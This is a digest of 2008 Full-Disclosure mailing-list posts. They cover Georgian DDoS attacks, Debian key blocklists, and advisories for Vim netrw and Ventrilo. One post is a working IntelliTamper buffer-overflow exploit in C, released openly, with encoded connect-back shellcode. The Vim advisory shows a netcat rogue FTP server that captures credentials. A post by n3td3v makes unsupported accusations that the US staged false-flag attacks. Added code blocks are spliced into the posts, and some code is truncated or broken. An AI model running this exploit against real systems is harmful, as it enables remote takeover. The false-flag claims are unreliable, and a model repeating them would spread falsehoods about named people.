[Full-disclosure] Storesonline, Ecommerce hosting solution - how to avoid mistakes that put your business at risk

2008-08-13 Thread Mister Nice Guy
*Storesonline, Ecommerce hosting solution - how to avoid mistakes that put
your business at risk*

Building an e-business inevitably requires a dedicated ecommerce hosting
solution that can support the infrastructures. There are plenty of areas to
take care of. Depending on your business types, you will need to consider
the technical areas that support the e-business transactions. Then
*Storesonline* is the right fit for you. You also need to have strong
customer support from the website provider. Reputation and security are
critical factors which sustain your business. In order to avoid pitfalls due
to an inferior host, this article reveals the mentioned areas and helps you
determine the steps to proceed further. *Storesonline* does avoid these
pitfalls and it's working really well.

Unlike hosting an ordinary website, running an ecommerce website such as an
online store can demand a high technical focus. For instance, you may need a
shopping cart and a payment processor. Other than these, you may also wish
to have regular backup service, site monitoring or digital certificates that
can protect your valuable business. If so, you have to choose an ecommerce
web site hosting plan that fits your needs. But it is really dependent on
the business size. If you sell a few products, a simple ecommerce web
hosting will be sufficient. *Storesonline* can handle the smallest mom and
pop site to the biggest on the planet. However, for a business site of much
larger scale, you need to consider the server usage and bandwidth. In such
case, a fast and stable server with bigger memories may be necessary.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] OpenID/Debian PRNG/DNS Cache poisoning advisory

2008-08-13 Thread Seth Breidbart
On Fri, August 8, 2008 8:37 pm, Forrest J. Cavalier III wrote:
> Eric Rescorla wrote:
>>
>> To be concrete, we have 2^15 distinct keys, so, the
>> probability of a false positive becomes (2^15)/(2^b)=2^(b-15).
>> To get that probability below 1 billion, b+15 >= 30, so
>> you need about 45 bits. I chose 64 because it seemed to me
>> that a false positive probability of 2^{-48} or so was better.

> Since it's a known set, I think you can use perfect hashing.
> There will still be false positives,

Since we don't care _which_ bad key it is, wouldn't
as-imperfect-as-possible hashing be better, by minimizing false positives?

Seth
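
The fingerprint-width arithmetic quoted above, worked through as an added example (not code from any poster in this thread). It assumes a blocklist that stores the top b bits of SHA-256 over each bad key; the hash choice and the `bad-N` / `good-N` key material are constructed for illustration. It also shows that collisions among the bad keys shrink the stored set and with it the false-positive rate.

```python
import hashlib
import math

N_BAD_KEYS = 2 ** 15  # size of the known-bad key set, from the quoted message


def false_positive_bound(n_bad: int, bits: int) -> float:
    """Union bound: chance a good key's b-bit fingerprint matches any bad one."""
    return min(1.0, n_bad / 2 ** bits)


def bits_needed(n_bad: int, target: float) -> int:
    """Smallest fingerprint width b such that n_bad / 2**b <= target."""
    return max(0, math.ceil(math.log2(n_bad / target)))


def fingerprint(key_material: bytes, bits: int) -> int:
    """Top `bits` bits of SHA-256 over the key (hash choice is an assumption)."""
    digest = int.from_bytes(hashlib.sha256(key_material).digest(), "big")
    return digest >> (256 - bits)


def build_blocklist(n_bad: int, bits: int) -> set:
    """Fingerprints of constructed stand-in keys b"bad-0", b"bad-1", ..."""
    return {fingerprint(b"bad-%d" % i, bits) for i in range(n_bad)}


def exact_false_positive_rate(blocklist: set, bits: int) -> float:
    """For a uniformly distributed good fingerprint the rate is |set| / 2**b;
    collisions among bad keys shrink the set and therefore the rate."""
    return len(blocklist) / 2 ** bits


def measured_false_positive_rate(blocklist: set, bits: int, trials: int) -> float:
    """Fraction of constructed good keys b"good-i" wrongly flagged as bad."""
    hits = sum(fingerprint(b"good-%d" % i, bits) in blocklist
               for i in range(trials))
    return hits / trials


if __name__ == "__main__":
    print("bits for a 2^-30 target:", bits_needed(N_BAD_KEYS, 2 ** -30))
    for bits in (20, 45, 64):
        bl = build_blocklist(N_BAD_KEYS, bits)
        print(bits, len(bl), false_positive_bound(N_BAD_KEYS, bits),
              measured_false_positive_rate(bl, bits, 20000))
```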




Re: [Full-disclosure] [funsec] Internet attacks against Georgian web sites

2008-08-13 Thread Gadi Evron
People need to realize it's quite possible these are just kids who 
attacked Georgia, and what that means.


On Mon, 11 Aug 2008, Paul Ferguson wrote:

> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> - -- Gadi Evron <[EMAIL PROTECTED]> wrote:
>
>> In the last days news and government web sites in Georgia suffered DDoS
>> attacks. While these attacks seem to affect the Georgian Internet, it is
>> still there.
>>
>
> Also, I wish to say:
>
> "It is clear that there are anti-Georgian forces at work on the
> Internet."
>
> "Who they are, and what their motivations are (at this point),
> remains to be seen."
>
> - - ferg
>
> -BEGIN PGP SIGNATURE-
> Version: PGP Desktop 9.6.3 (Build 3017)
>
> wj8DBQFIn+HCq1pz9mNUZTMRAg5bAKC14z8wNBom1TASstp9D6n3fL4bLwCfSzxU
> cQcPfvWSi7j3Bwpgy1hPZJM=
> =5lFT
> -END PGP SIGNATURE-
>
>
> --
> "Fergie", a.k.a. Paul Ferguson
> Engineering Architecture for the Internet
> fergdawg(at)netzero.net
> ferg's tech blog: http://fergdawg.blogspot.com/
>
>



Re: [Full-disclosure] [funsec] Internet attacks against Georgian web sites

2008-08-13 Thread Paul Ferguson
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -- Gadi Evron <[EMAIL PROTECTED]> wrote:

> People need to realize it's quite possible these are just kids who
> attacked Georgia, and what that means.
>

Certainly -- anything is possible.

I would note, however, that if it _is_ "kids", then they have access
to the same servers/services being used by other "known" criminal
elements.

- - ferg

-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.6.3 (Build 3017)

wj8DBQFIohKqq1pz9mNUZTMRArkhAKD7uqnFEai2aGW1rkxkHIYfF0y3TACfekM/
Pl9LCRceBBFmAtZ+2jLldMk=
=0TXm
-END PGP SIGNATURE-



--
"Fergie", a.k.a. Paul Ferguson
 Engineering Architecture for the Internet
 fergdawg(at)netzero.net
 ferg's tech blog: http://fergdawg.blogspot.com/



Re: [Full-disclosure] [funsec] Internet attacks against Georgian web sites

2008-08-13 Thread Gadi Evron
On Tue, 12 Aug 2008, Paul Ferguson wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> - -- Gadi Evron <[EMAIL PROTECTED]> wrote:
>
>> People need to realize it's quite possible these are just kids who
>> attacked Georgia, and what that means.
>>
>
> Certainly -- anything is possible.
>
> I would note, however, that if it _is_ "kids", then they have access
> to the same servers/services being used by other "known" criminal
> elements.

Russian speaking elements who live there, read the papers, etc.
We are all dissidents in our own way.

Gadi.

> - - ferg
>
> -BEGIN PGP SIGNATURE-
> Version: PGP Desktop 9.6.3 (Build 3017)
>
> wj8DBQFIohKqq1pz9mNUZTMRArkhAKD7uqnFEai2aGW1rkxkHIYfF0y3TACfekM/
> Pl9LCRceBBFmAtZ+2jLldMk=
> =0TXm
> -END PGP SIGNATURE-
>
>
>
> --
> "Fergie", a.k.a. Paul Ferguson
> Engineering Architecture for the Internet
> fergdawg(at)netzero.net
> ferg's tech blog: http://fergdawg.blogspot.com/
>
>



Re: [Full-disclosure] Internet attacks against Georgian web sites

2008-08-13 Thread Viktor Larionov
Hi all,

As a comment to Gadi's story: it's not nice to accuse anyone if it's still
not clear who's behind all this and what is really happening.
As a matter of fact, personally I trust Saakashvili almost the same as I
trust Medvedev - I'd bet both sides try to make themselves "white and fluffy
bunny rabbits being bullied by the opposite side".
I would say, it's too early to make any kind of conclusions or tell any kind
of facts - a serious media-war is going on, and if you ask me - it's the
only fact which we may trust.
As an example you can switch CNN or SkyNews, and then for example switch to
ORT or NTV (Russia's first and second biggest channels) - it's two 100%
diametric positions with different facts, different opinions and different
pictures.

I suppose it's wiser not to start stories on cyberwar and just wait until
both sides cool down - to see what was really behind all that: mr.
Saakashvili's fantasy or a serious act of cyber warfare.
By the way, Lithuanians are not the case, seriously, it was an internal act
of Lithuanian kiddie-comrades as far as I know, and has nothing to do with
cyber warfare.

As a matter of fact I would add another fact as point 5. to your list, more
of a humorous type, possibly everybody already knows this, but just in case:
5. Georgian Foreign ministry let's say "moved" their website to Blogspot.
:)
http://cabalamat.wordpress.com/2008/08/12/georgian-foreign-ministry-news-service/

I will not be surprised if in some time the Saakashvili will make his
official e-mail address: [EMAIL PROTECTED]
:)


Kindest regards,
Viktor

-Original Message-
From: Gadi Evron [mailto:[EMAIL PROTECTED]
Sent: Monday, August 11, 2008 9:40 AM
To: [EMAIL PROTECTED]
Cc: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED]
Subject: Internet attacks against Georgian web sites


In the last days news and government web sites in Georgia suffered DDoS
attacks. While these attacks seem to affect the Georgian Internet, it is
still there.

Facts:
1. There are botnet attacks against .ge websites.
2. These attacks affect the .ge Internet infrastructure, but it's reachable.
3. It doesn't seem Internet infrastructure is directly attacked.
4. Every other political tension in the past 10 years, from a comic of the
Prophet Muhammad to the war in Iraq, were followed by online supporters
attacking targets which seem affiliated with the opposing side, and
vice versa.

Up to the Estonian war, such attacks would be called "hacker enthusiast
attacks" or "cyber terrorism" (of the weak sort). Nowadays any attack with a
political nature seems to get the "information warfare" tag. When 300
Lithuanian web sites were defaced last month, "cyber war" was the buzzword.

Running security for the Israeli government Internet operation and later the
Israeli government CERT such attacks were routine, and just by speaking on
them in the local news outlets I started bigger so-called "wars" when
enthusiasts responded in the story comments and then attacks the "other side".

Not every fighting is warfare. While Georgia is obviously under a DDoS
attacks and it is political in nature, it doesn't so far seem different than
any other online after-math by fans. Political tensions are always followed by
online attacks by sympathizers.

Could this somehow be indirect Russian action? Yes, but considering Russia is
past playing nice and uses real bombs, they could have attacked more strategic
targets or eliminated the infrastructure kinetically.

Coulda, shoulda… the nature of what's going on isn't clear, but until we are
certain anything state-sponsored is happening on the Internet it is my
official opinion this is not warfare, but just some unaffiliated attacks by
Russian hackers and/or some rioting by enthusiastic Russian supporters.

It is too early to say for sure what this is and who is behind it.

The RBN blog (following the Russian Business Network) is of a different
opinion:
http://rbnexploit.blogspot.com/2008/08/rbn-georgia-cyberwarfare.html
and:
http://rbnexploit.blogspot.com/2008/08/rbn-georgia-cyberwarfare-2-sat-16-00.html

Also, Renesys has been following the situation and provides with some data:
http://www.renesys.com/blog/2008/08/georgia_clings_to_the_net.shtml

(Thanks to Paul Ferguson for the URLs)

DDoS attacks harm the Internet itself rather than just this or that web site,
so soon this may require some of us in the Internet security operations
community getting involved in mitigating the attacks, if they don't just drop
on their own.

Gadi Evron.

--
"You don't need your firewalls! Gadi is Israel's firewall."
 -- Itzik (Isaac) Cohen, "Computers czar", Senior Deputy to the
Accountant General,
Israel's Ministry of Finance, at the government's CIO conference,
2005.

 (after two very funny self-deprecation quotes, time to even things up!)

My profile and resume:
http://www.linkedin.com/in/gadievron


[Full-disclosure] IntelliTamper v2.07/2.08 Beta 4 A HREF sploit

2008-08-13 Thread kralor

Old exploit, released for the masses.


kralor, Crpt & HiC.

//
/* [Crpt]  IntelliTamper v2.07/2.08 Beta 4 sploit by kralor  [Crpt] */
//
/* NO MORE  */
/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */
/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */
/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */
/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */
//
/* Exploit tested on Jef_FR without his knowledge, works fine, 100% :)   */
/* Jef_FR can confirm it for you, hehe :P                               */
/* By the way it is universal, because if the person uses v2.08beta4,   */
/* well, there is SEH, so the first link, which is made smaller         */
/* for v2.07, will not cause a crash; it will be handled by the         */
/* program.. Anyway, what more to say... Except that one can perhaps    */
/* jump directly without going to a jmp ebx, using 0x00F1FFDC           */
/* I noticed that on both versions once it crashes                      */
/* (I catch the exception even if the program has SEH!) ebx points to   */
/* this offset, always the same (~end of our buffer). I have not        */
/* looked at other platforms, since I already have rets                 */
/* (jmp ebx) that work very well :) that's all, folks, enjoy.           */
/*  */
/* P.S.: Make sure your IP XORed with 0x98 does not give a bad          */
/* opcode such as < > " \r \n ... It's not rocket science to code :)    */
//
/* informations: www.coromputer.net, irc undernet #coromputer   */
//

#include 
#include 
#include 

#ifdef _WIN32
#include 
#pragma comment(lib, "ws2_32")
#else
#include 
#endif

#define SIZEOF   14448 /* IntelliTamper v2.08 Beta 4 AND v2.07
* for v2.07 it isn't this size 'cause
* there's a *missing* in RET_ADDR2
* so it cuts the size.
*/

#define SCOFFSET 1 /* IntelliTamper v2.08 Beta 4 */
#define RET_POS  SIZEOF-4
#define RET_ADDR 0x004368C4

#define SCOFFSET2 100  /* IntelliTamper v2.07 */
#define RET_POS2  6832
#define RET_ADDR2 0x00437224

#define u_short unsigned short
#define u_char  unsigned char
#define HOP 0xd9 /* host opcode */
#define POP 0xda /* port opcode */
#define BEGIN "hi\r\n\r\n"
#define END   "\r\n"

int set_sc(char *host,unsigned long port, char *sc)
{
  unsigned long ip,p;
  unsigned int i;

  ip=inet_addr(host)^0x98989898;
  p=htons((u_short)port);
  p=p<<16;
  p+=0x0002;
  p=p^0x98989898;

for(i=0;i  \n",prog);
  exit(0);
}

void banner(void)
{
  printf("\n\t[Crpt] IntelliTamper v2.07/2.08 Beta 4 sploit " \
 "by kralor [Crpt]\n");
  printf("\t\t  www.coromputer.net && undernet #coromputer\n\n");
  return;
}

int main(int argc, char *argv[])
{
  char buffer[SIZEOF];
  unsigned long port;
  FILE *file;
  char shellc0de[] =   /* sizeof(shellc0de+xorer) == 334 bytes */
  /* classic xorer */
  /* "\xcc" */
  "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66"
  "\xb9\x3f\x01\x80\x33\x98\x43\xe2\xfa"
  /* shellc0de */
  "\x19\x5c\x50\x98\x98\x98\x13\x74\x13\x6c\xcd\xce\xfc\x39\xa8\x98"
  "\x98\x98\x13\xd8\x94\x13\xe8\x84\x35\x13\xf0\x90\x73\x98\x13\x5d"
  "\xc6\xc5\x11\x9e\x67\xae\xf0\x16\xd6\x96\x74\x70\x35\x98\x98\x98"
  "\xf0\xab\xaa\x98\x98\xf0\xef\xeb\xaa\xc7\xcc\x67\x48\x13\x60\xcf"
  "\xf0\x41\x91\x6d\x35\x70\x0b\x98\x98\x98\xab\x51\xc9\xc9\xc9\xc9"
  "\xd9\xc9\xd9\xc9\x67\x48\x11\xde\xbc\xcf\xf0\x74\x61\x32\xf8\x70"
  "\xe1\x98\x98\x98\xf0\xd9\xd9\xd9\xd9\xf0\xda\xda\xda\xda\x13\x54"
  "\xf2\x88\xc9\x67\xee\xbc\x67\x48\xf0\xfb\xf5\xfc\x98\x11\xfe\xa8"
  "\x67\xae\xf0\xea\x66\x2b\x8e\x70\xc9\x98\x98\x98\x11\xde\x86\x1b"
  "\x74\xcc\x15\xa4\xbc\xab\x58\xab\x51\x1b\x59\x8d\x33\x7a\x65\x5e"
  "\xdc\xbc\x88\xdc\x66\xdc\xbc\xa5\x66\xdc\xbc\xa4\x13\xde\xbc\x11"
  "\xdc\xbc\xd0\x11\xdc\xbc\xd4\x11\xdc\xbc\xc8\x15\xdc\xbc\x88\xcc"
  "\xc8\xc9\xc9\xc9\xf2\x99\xc9\xc9\x67\xee\xa8\xc9\x67\xce\x86\x67"
  "\xae\xf0\x77\x56\x78\xf8\x70\x9a\x98\x98\x98\x67\x48\xcb\xcd\xce"
  "\xcf\x13\xf4\xbc\x80\x13\xdd\xa4\x13\xcc\x9d\xe0\x9b\x4d\x13\xd2"
  "\x80\x13\xc2\xb8\x9b\x45\x7b\xaa\xd1\x13\xac\x13\x9b\x6d\xab\x67"
  "\x64\xab\x58\x34\xa2\x5c\xec\x9f\x59\x57\x95\x9b\x60\x73\x6a\xa3"
  "\xe4\xbc\x8c\xed\x79\x13\xc2\xbc\x9b\x45\xfe\x13\x94\xd3\x13\xc2"
  "\x84\x9b\x45\x13\x9c\x13\x9b\x5d\x73\x9a\xab\x58\x13\x4d\xc7\xc6"
  "\xc5\xc3\x5a\x9c\x98";

  banner();

  if(argc!=4)
syntax(argv[0]);

  por

Re: [Full-disclosure] Vim: Netrw: FTP User Name and Password Disclosure

2008-08-13 Thread Tony Mechelynck
On 12/08/08 23:59, Jan Minář wrote:
> Vim: Netrw: FTP User Name and Password Disclosure
>
> 1. SUMMARY
>
> Product  : Vim -- Vi IMproved
> Versions : Tested with Vim 7.1.266, 7.2, autoload/netrw.vim v131, v109
> Impact   : Credentials disclosure
> Wherefrom: Remote
> Original : http://www.rdancer.org/vulnerablevim-netrw-credentials-dis.html
>
> The Vim Netrw Plugin shares the FTP user name and password across all
> FTP sessions.  Every time Vim makes a new FTP connection, it sends the
> user name and password of the previous FTP session to the FTP server.
>
>
> 2. BACKGROUND
>
>``Vim is an almost compatible version of the UNIX editor Vi.  Many new
>  features have been added: multi-level undo, syntax highlighting,
>  command line history, on-line help, spell checking, filename
>  completion, block operations, etc.''
>
>   -- Vim README.txt
>
>``Netrw supports "transparent" editing of files on other machines
>  using [...] vim ftp://hostname/path/to/file''
>
>``Attempts to use ftp will prompt you for a user-id and a password.
>  These will be saved in global variables g:netrw_uid and
>  s:netrw_passwd; subsequent uses of ftp will re-use those two items
>  to simplify the further use of ftp.  However, if you need to use a
>  different user id and/or password, you'll want to call NetUserPass()
>  first.''
>
>   -- Netrw Reference Manual (``pi_netrw.txt'')
>
>
> 3. VULNERABILITY
>
> Once vim successfully connects to an FTP server using a user name and
> password credentials, it will re-use them in all subsequent FTP
> sessions, regardless of the domain name or TCP port.
>
> This behaviour is documented, although the documentation states the
> credentials are ``retained on a per-session basis''.  Apparently the Vim
> session, not the FTP session:
>
>``g:netrw_uid  (ftp) user-id,retained on a per-session basis
>  s:netrw_passwd   (ftp) password,   retained on a per-session basis''
>
>   -- Netrw Reference Manual (``pi_netrw.txt'')
>
> Although FTP communication is not encrypted and therefore open to
> eavesdropping, if the access to the network is protected, a
> credentials-based access control is meaningful, and the credentials must
> be kept secret.  For example, an FTP connection to a virtual Xen
> instance on the same physical machine is secure; so is an FTP session
> over a local ethernet segment secured against access from untrusted
> parties.
>
>
> 4. EXPLOIT
>
> No adversary action on the part of the attacker is necessary, apart from
> keeping logs of the user name, password, source IP address, and other
> information about the FTP session.
>
> An example using netcat(1) for the rogue FTP server.  There is another
> FTP server already running on the machine:
>
>  # For the sake of this example, a custom hosts file.  Note that
>  # ftp.secure.example and ftp.rogue.example map to different IP
>  # addresses.
>  $ grep '\.example' /etc/hosts
>  127.0.1.1   ftp.secure.example
>  127.0.1.2   ftp.rogue.example
>  # There is a stock FTP server running already
>  $ netstat -plan | grep ftp
>  tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 30623/vsftpd
>  # Start the rogue FTP server
>  $ printf '220\r\n331\r\n' \
>  | netcat -lp 31337 ftp.rogue.example>  credentials&
>  # We use the ex command for clarity.
>  $ ex ftp://ftp.secure.example/
>  Enter username: rdancer
>  Enter Password: *
>  Entering Ex mode.  Type "visual" to go to Normal mode.
>  :spl ftp://ftp.rogue.example:31337/
>  "ftp://ftp.rogue.example:31337/";  --No lines in buffer--
>  :qa!
>  $ cat credentials
>  USER rdancer
>  PASS z5vS24u76OrGM
>
>
> 5. COPYRIGHT
>
> This advisory is Copyright 2008 Jan Minar<[EMAIL PROTECTED]>
>
> Copying welcome, under the Creative Commons ``Attribution-Share Alike''
> License http://creativecommons.org/licenses/by-sa/2.0/uk/
>
> Code included herein, and accompanying this advisory, may be copied
> according to the GNU General Public License version 2, or the Vim
> license.  See the subdirectory ``licenses''.
>
> Various portions of the accompanying code may have been written by
> various parties.  Those parties may hold copyright, and those portions
> may be copied according to their respective licenses.
>
>
> 6. HISTORY
>
> 2008-08-12 Sent to:<[EMAIL PROTECTED]>,<[EMAIL PROTECTED]>,
>   ,
>   <[EMAIL PROTECTED]>,
>  Charles E Campbell, Jr (Vim Netrw Plugin Maintainer)
>   <[EMAIL PROTECTED]>

If the attacker has access to full logs of the FTP back-and-forth talk, 
is it possible to keep the username and password secret?

Netrw mentions that if there exists a .netrc file (which ftp will use if 
it is not world-readable, e.g. on Linux it needs 600 permissions) which 
includes an applicable "machine" or "default" line, the user won't be 
asked for a username and password (see ":help netrw-netrc"). I
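
The credential reuse described in the quoted advisory, modelled next to a per-origin alternative. This is an added example, not Netrw's code and not from either poster; the class names, the `replay` helper and the password string are hypothetical, and only the two `.example` host names and the port come from the advisory.

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"ftp": 21}


def origin(url: str) -> tuple:
    """(scheme, host, port) that a credential should be bound to."""
    parts = urlsplit(url)
    if not parts.hostname:
        raise ValueError("URL has no host: %r" % url)
    return (parts.scheme, parts.hostname.lower(),
            parts.port or DEFAULT_PORTS.get(parts.scheme))


class SessionWideCache:
    """Model of the behaviour the advisory describes: one user name and
    password for the whole editor session, whatever the server."""

    def __init__(self):
        self._cred = None

    def lookup(self, url):
        return self._cred

    def store(self, url, cred):
        self._cred = cred


class PerOriginCache:
    """Hardened variant: a credential is reused only for the origin it was
    entered for; a new host or port means a new prompt."""

    def __init__(self):
        self._creds = {}

    def lookup(self, url):
        return self._creds.get(origin(url))

    def store(self, url, cred):
        self._creds[origin(url)] = cred


def replay(cache, urls, user_answers):
    """Return [(url, credential sent or None)] for each connection in order.

    user_answers maps host -> (user, password) the user is willing to type;
    a host missing from it means the user declines the prompt."""
    sent = []
    for url in urls:
        cred = cache.lookup(url)
        if cred is None:
            cred = user_answers.get(origin(url)[1])  # simulated prompt
            if cred is not None:
                cache.store(url, cred)
        sent.append((url, cred))
    return sent


# Constructed session mirroring the advisory's two host names.
URLS = ["ftp://ftp.secure.example/", "ftp://ftp.rogue.example:31337/"]
ANSWERS = {"ftp.secure.example": ("rdancer", "constructed-secret")}

if __name__ == "__main__":
    print("session-wide:", replay(SessionWideCache(), URLS, ANSWERS))
    print("per-origin:  ", replay(PerOriginCache(), URLS, ANSWERS))
```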

[Full-disclosure] (no subject)

2008-08-13 Thread ff0000
Title: Hushmail Express










[EMAIL PROTECTED] has sent you a secure email
using Hushmail. To read it, please visit the following web page:


https://www.hushmail.com/express/4JS7VCHT




Frequently Asked Questions:


Why did I receive this email?

You have received this email because you have been sent a secure email through Hushmail. To read your secure email, you must follow the link provided and correctly answer a secret question chosen by the sender.


What is a secure email?

Sending a regular email is like sending a postcard - it may be read by any number of people before reaching its recipient(s). A secure email is like sending a letter in a sealed envelope - it can only be read by the sender and intended recipient(s).


Is it safe to follow the link in this email?

Yes, it is safe to visit the Hushmail web site by following the link provided in this email. However, you should never open an email attachment unless you know the person who sent it, were expecting to receive the file from them, and have scanned the file for viruses.
When you arrive at the Hushmail web site, be sure to check the following:

The address bar of your web browser shows: https://www.hushmail.com/express/

A small picture of a padlock appears in the bottom right corner of your web browser


If you would prefer to access your message by entering its message
code, please visit the following web page: https://www.hushmail.com/express.
You will be asked to enter the following message code: 4JS7 VCHT


What is Hushmail?

Hushmail is a web-based email service that lets you send and receive email in total security using OpenPGP standard algorithms.  These algorithms, combined with Hushmail's unique key management system, provide unrivalled levels of security.


Hushmail's encryption is automatic, transparent, and seamless - no special computer skills are required.


How do I create a free Hushmail account?

You can create a free Hushmail account by clicking on the following link: https://www.hushmail.com/





[Full-disclosure] OpenVAS Stable Release

2008-08-13 Thread Michael Wiegand
Hello,

the OpenVAS project is proud to announce the release of the first stable 
version of the "Open Vulnerability Assessment System". OpenVAS is a fork of 
the Nessus security scanner; while Nessus switched to a proprietary license, 
OpenVAS will continue to improve the scanner and will provide all components 
as Free Software.

In July 2008 the OpenVAS developer team finished the update cycle of the 1.0 
release including all four server modules and the client.

The most work during this update cycle went into cleanups and support for RPM 
and Debian packagers. The number of necessary bug-fixes remained pleasingly 
low.

OpenVAS installation packages are readily available for various platforms: 
OpenSUSE, Fedora, Mandrake, FreeBSD and Gentoo. Packages for Debian and 
Ubuntu are in the works. Additionally, OpenVAS-Client is available for 
Microsoft Windows operating systems.

The OpenVAS developer team has started creating a comprehensive documentation 
for the whole toolchain; the next major challenge for the project is now to 
extend the range of the vulnerability tests for present and upcoming security 
issues, especially for those reported as CVEs, BIDs etc.

It is a fundamental goal of the OpenVAS project team to accompany the Free 
Software OpenVAS network security scanner licensed under GNU GPL with a feed 
of vulnerability tests being Open Source and readily available for everyone 
as well. Additional contributors are welcome to join the OpenVAS developer 
team.

For more information please visit: http://www.openvas.org/

Regards,

Michael Wiegand
-- 
Michael Wiegand   OpenPGP key: D7D049EC
Intevation GmbH, Osnabrück   http://www.intevation.de/
Amtsgericht Osnabrück, HR B 18998
Geschäftsführer: Frank Koormann, Bernhard Reiter, Dr. Jan-Oliver Wagner



Re: [Full-disclosure] Internet attacks against Georgian web sites

2008-08-13 Thread n3td3v
On Wed, Aug 13, 2008 at 6:43 AM, Viktor Larionov
<[EMAIL PROTECTED]> wrote:
> Hi all,
>
> As a comment to Gadi's story: it's not nice to accuse anyone if it's still
> not clear who's behind all this and what is really happening.
>

It would be great for the U.S to take down the .ge sites while Russia
is attacking Georgia in a ground conflict, as it ramps up U.S's
ambitions for an offensive cyber command.

They already cyber false flagged Estonia to get money support
politically and public acceptance for the big U.S cyber command to get
built in the first place.

Now that the big U.S cyber command has been given the go ahead because
of the Estonia cyber false flag, they've got to keep reasons in the
media that the U.S cyber command is still a good idea.

Russia gets all the blame for the .ge cyber attacks and U.S get to
keep the politicians and the public sweet about the ongoing need for
the big U.S cyber command and "legitimate" reasons for its existence.

I couldn't think of a better time for U.S to do a bit of cyber false
flagging, than is when another country invading another, while keeping
U.S cyber ambitions afloat politically and publicly.

Remember, U.S need to keep the idea of ground conflict and cyber
attacks as the same thing in the eyes of the public and the
politicians or the idea of the U.S cyber command doesn't float.

In reality, proper government-led cyber attacks wouldn't target web
sites, this is purely an attention seeking exercise to highlight the
ongoing need for the U.S cyber command.

In reality, proper government-led cyber attacks are invisible to the
public, as they are targeting specific government and military stuff
that the public and politicians don't get a chance to know about. It's
a classic media whoring exercise to take out web sites, as taking out
websites has no real cyber operational value apart from a bit of media
whoring.

I don't think it was Russia, but Russia have been framed by the U.S.
who need to keep the ideology of a U.S offensive cyber command afloat
and OK'd as the next president and its administration take over, so
that "cyber" gets full funding and the attention of Obama or McCain.

Watch this video by Marcus Sachs at Black Hat 2008
http://www.youtube.com/watch?v=FSUPTZVlkyU, he talks about, how are we
going to get the next president's attention in the transition period
in the first 100 days of Obama or McCain getting into the White House
and to take "cyber" seriously?

Now by this video it seems that Marcus Sachs
http://en.wikipedia.org/wiki/Marcus_Sachs is trying to say we need a
cyber false flag attack in the first 100 days that Obama or McCain get
into the White House to make sure "cyber" is fully funded and that
cyber offensive operations are fully OK'd for the next four to eight
years.

"We want to get the attention of the next administration as they are
coming in" --Marcus Sachs.

He talks about the first two months or 100 days of the next presidency
is crucial in getting the attention of the president and its
administration.

Is this a hidden message here by Marcus Sachs about a Die Hard 4.0
scenario false flag attack being planned?

He said also in the video, when Bush was coming in, the powers that be
got their attention with 9/11 and that "cyber" got distracted, and now
he is basically saying when Obama or McCain come in that the U.S
government underworld are planning a cyber 9/11.

It seems that Marcus Sachs is frustrated that 9/11 got all the
attention last time, and now the powers that be are going to make sure
"cyber" takes up the main agenda this time around.

How are they going to get the attention of the next presidency to get
"cyber" fully funded and taken seriously is anyone's guess, but I fear
the worst and that we must keep our eyes and ears open for any false
flagging and other suspicious looking cyber security incidents, so we
are better prepared to call out "false flag" at the earliest
opportunity.

All the best,

n3td3v



[Full-disclosure] NULL pointer in Ventrilo 3.0.2

2008-08-13 Thread Luigi Auriemma

###

 Luigi Auriemma

Application:  Ventrilo
              http://www.ventrilo.com
Versions:     <= 3.0.2
Platforms:    Windows, Linux i386, Solaris SPARC, Solaris x86, FreeBSD
              i386, NetBSD i386, Mac OSX PowerPC
Bug:          NULL pointer
Exploitation: remote, versus server
Date:         13 Aug 2008
Authors:      Andre Malm                Luigi Auriemma
              web:    sheepa.org        e-mail: [EMAIL PROTECTED]
                                        web:    aluigi.org


###


1) Introduction
2) Bug
3) The Code
4) Fix


###

===
1) Introduction
===


Ventrilo is one of the most known and used voice chat softwares for
gamers.


###

==
2) Bug
==


Despite the vice of the Ventrilo developers of changing the protocol of
their application enough often (like the recent senseless additional
encryption keys located on their centralized servers needed for the
handshake and the in-game packets of the 3.x servers), the first packet
sent to a Ventrilo server has ever the same format on any new and old
version: type 0, version and two random strings.

If the server receives a version string different than its one it sends
an "Incompatible version" error message to the client and skips the
instructions that create the random keys used for the encryption and
decryption of all the subsequent packets.

So if an attacker supplies an invalid version and sends another packet
with any content in it, the server crashes due to the key assigned for
the decryption of the client's packets which is still uninitialized (in
fact the NULL pointer exception happens just in the decryption
function).


###

===
3) The Code
===


http://aluigi.org/poc/ventrilobotomy.zip


###

==
4) Fix
==


No official fix.

I have written an universal work-around which works with any version
and platform (SPARC and Mac OSX excluded) of the dedicated server:

  http://aluigi.org/patches/ventrilobotomyfix.zip


###


--- 
Luigi Auriemma
http://aluigi.org
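
The control-flow flaw described in section 2, modelled as a small session state machine with a hardened handler beside it. This is an added example and not Ventrilo's code or the advisory's work-around: the packet dictionaries, state names and XOR stand-in cipher are assumptions, and Python's `TypeError` on a `None` key plays the role of the NULL dereference.

```python
import os
from dataclasses import dataclass
from typing import Optional

SERVER_VERSION = "3.0.2"  # version string from the advisory, used as a label


@dataclass
class Session:
    state: str = "await_hello"   # await_hello -> established | closed
    key: Optional[bytes] = None  # set only by a successful handshake


def xor_decrypt(key: bytes, data: bytes) -> bytes:
    """Toy stand-in for the real cipher; fails if key is None."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def handle_vulnerable(s: Session, packet: dict):
    """Assumed model of the flaw: the error path skips key setup but the
    session still goes on to treat later packets as encrypted."""
    if s.state == "await_hello":
        s.state = "established"
        if packet.get("version") != SERVER_VERSION:
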